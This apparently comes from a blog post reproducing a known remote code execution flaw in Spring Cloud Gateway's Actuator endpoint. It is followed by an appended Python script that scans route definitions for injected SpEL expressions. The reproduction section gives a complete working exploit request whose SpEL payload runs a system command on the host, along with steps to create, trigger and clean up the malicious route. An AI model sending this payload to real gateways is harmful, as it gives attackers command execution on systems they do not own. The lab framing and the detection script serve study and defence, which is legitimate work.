Disclaimer: This article is for learning and reference only. All resources involved in it come from the Internet. Please do not use them for any illegal activity; otherwise you bear the corresponding consequences yourself, and I assume no legal or joint and several liability.
Vulnerability description
Applications using Spring Cloud Gateway are vulnerable to code injection when the Actuator endpoint is enabled, exposed, and unsecured. An attacker can craft malicious requests that achieve arbitrary remote code execution on the host.
Once an attacker can reach the actuator API, the vulnerability can be exploited to execute arbitrary commands.
Affected versions
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Other Spring Cloud Gateway versions that are no longer maintained
Environment build
The vulnerable environment is built with vulhub; look up the build steps yourself.
After building successfully, visit
Vulnerability reproduction
1. Check whether the actuator endpoint is enabled
Capture the request and change the path to /actuator
2. View /actuator/gateway/routes
The returned routing information shows that a request to index is routed to http://example.com:80
3. Create a route
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431
{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}
4. Refresh the routes
5. Access the created route
6. Delete the route
7. Refresh the routes again
8. Visit the route again and observe that it has been deleted
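A defender-side check, added here and not part of the original post: the injection works because Spring Cloud Gateway evaluates `#{...}` templates in route filter arguments as SpEL, so an audit of route definitions (in the RouteDefinition JSON shape used by the request above: id, filters[].name/args, uri, order; the `predicates` key is the corresponding real RouteDefinition field) can flag any argument carrying a SpEL template, and rate it critical when the template uses a `T(...)` type reference or the Runtime/exec calls seen in the payload. The sample routes are constructed; the injected one reuses the page's own payload.

```python
import json

# Tokens that appear when a SpEL template reaches static methods / process execution.
# Any T(...) type reference in a route argument is suspicious on its own.
DANGEROUS_TOKENS = ("T(", "java.lang.Runtime", "getRuntime", ".exec(")

def spel_expressions(value):
    """Return each '#{...}' template in value, matching nested braces (array/map literals)."""
    out, i = [], 0
    while True:
        start = value.find("#{", i)
        if start < 0:
            return out
        depth, j = 0, start + 1
        while j < len(value):
            if value[j] == "{":
                depth += 1
            elif value[j] == "}":
                depth -= 1
                if depth == 0:
                    out.append(value[start:j + 1])
                    break
            j += 1
        else:
            out.append(value[start:])  # unterminated template: still worth flagging
            return out
        i = j + 1

def audit_route(route):
    """Findings for one RouteDefinition-shaped dict: every filter/predicate arg holding SpEL."""
    findings = []
    for kind in ("filters", "predicates"):
        for item in route.get(kind, []):
            for arg_name, value in item.get("args", {}).items():
                if not isinstance(value, str):
                    continue
                for expr in spel_expressions(value):
                    severity = "critical" if any(t in expr for t in DANGEROUS_TOKENS) else "warning"
                    findings.append({"route_id": route.get("id"), "severity": severity,
                                     "location": f"{kind}/{item.get('name')}/{arg_name}",
                                     "expression": expr})
    return findings

def audit_routes(routes):
    return [f for route in routes for f in audit_route(route)]

# Constructed sample: the benign 'index' route plus the injected 'test' route from above.
SAMPLE_ROUTES = json.loads(r'''[
  {"id": "index", "filters": [], "uri": "http://example.com:80", "order": 0},
  {"id": "test", "uri": "http://example.com:80", "order": 0,
   "filters": [{"name": "AddResponseHeader", "args": {"name": "cmd",
     "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}}]}
]''')

if __name__ == "__main__":
    for f in audit_routes(SAMPLE_ROUTES):
        print(f"[{f['severity']}] route={f['route_id']} at {f['location']}: {f['expression'][:60]}...")
```

Running the same audit over the response of the routes listing after each "refresh" step gives a quick way to confirm no injected filter survived the deletion.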